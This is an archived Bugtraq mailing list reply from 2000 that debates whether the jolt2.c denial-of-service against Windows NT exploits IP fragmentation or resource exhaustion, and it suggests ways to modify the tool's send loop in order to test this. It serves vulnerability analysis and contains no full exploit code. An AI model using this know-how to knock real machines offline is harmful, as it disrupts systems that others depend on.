Bugtraq mailing list archives

Re: Revision 2: Analysis of jolt2.c (MS00-029)


From: dleblanc () MINDSPRING COM (David LeBlanc)
Date: Mon, 29 May 2000 20:39:57 -0700


At 05:38 PM 5/27/00 +0200, you wrote:

Phonix <phonix () moocow org> wrote:
By the way, setting the checksum to 0 is perfectly valid
if you are offloading the checksumming to the NIC.

The code never mentioned this, and I failed to think of it.
However:

This is also the way that many stacks work, even with IP_HDRINCL set - in
order to get the IP stack (or NIC) to calculate it for you, leave it set to
zero. Again, this is why it is usually best to look and see what something
is doing on the wire before going off and assuming mistakes.

I originally thought that this _may_ be proof of another
problem - What if _this_ code isn't exploiting a fragmentation
vulnerability, but rather a network layer resource exhaustion
vulnerability? The net results could be the same (CPU and RAM
crunching), but be caused by entirely different reasons.

It is really pretty trivial to check for this.  Just make a regular UDP or
ICMP socket, bind it, build some data segment, and blast away.  See what
the results are on the other end.  I've done this years ago, and NT shrugs
it off.  You see a little CPU rise, but even getting hit with that locally
on a 100Mb segment, you don't get the machine to freeze.  I like to test
things before I speculate in public.  YMMV.

Several people have told (flamed?) me that I am completely wrong,
simply because the Microsoft and Bindview advisories state
that it is a fragmentation problem.

Well - pretty easy to test with the code that is out there.  Just modify
the packet to make it a normal, nonfragmented packet, note that the machine
doesn't freeze.  You put the frag bit back, set the offset, and the problem
comes back. Seems obvious to me.

This does not change the facts however.

The facts are that the frag bit has to be set, or you can't cause a problem.

I would _really_
like to see this code (jolt2.c) have the same results
_WITH_ rate limiting implemented before I blindly accept
the results.

OK, this is also trivial to do - instead of:

while(1)
{
  sendto(...);
}

inject a sleep(), or for a finer grained timeout, use a select().  Or stick
a counter in there, send some number of packets and stop.  Now see what the
behavior of the target is.

(I'm not saying anyone is lying here, I just
like seeing proof before accepting something as facts.)

Well, so go try it and see.  The code is really fairly nicely written
(despite disclaimers about being hacked together), and all these variants
that would allow you to actually test these things are easy to modify.  To
me, that's what you do when you analyze a problem, but again, YMMV.

1. Microsoft doesn't verify the structural integrity (the
  packet is truncated!)

Or it triggers a problem before any further verification can be performed.
There are a lot of validation steps in determining whether a packet is
good, and the ordering of these steps is a very non-trivial optimization
problem. If something goes fubar at step n, then step n+1 isn't going to be
reached, and we cannot come to conclusions about the efficiency or even the
presence of step n+1.

2. It is really a network layer resource exhaustion attack
  rather than a fragmentation attack. (NOTE! THIS IS JUST
  A THEORY! I WOULD HAPPILY BE PROVEN WRONG HERE, BUT PLEASE
  PROVIDE PROOF RATHER THAN JUST FLAME ME!)

So test your theories.  Esp. when the code you have makes it easy.  If you
could say "I modified jolt2.c to change such and such, and NT [still blows
up | does not blow up | my router dies instead | the wires all melt | ...
]", then that would be really useful to know.  Without testing, you've just
annotated the code (which is nice), but all the speculation without testing
isn't all that helpful (to me).

David LeBlanc
dleblanc () mindspring com


Current thread: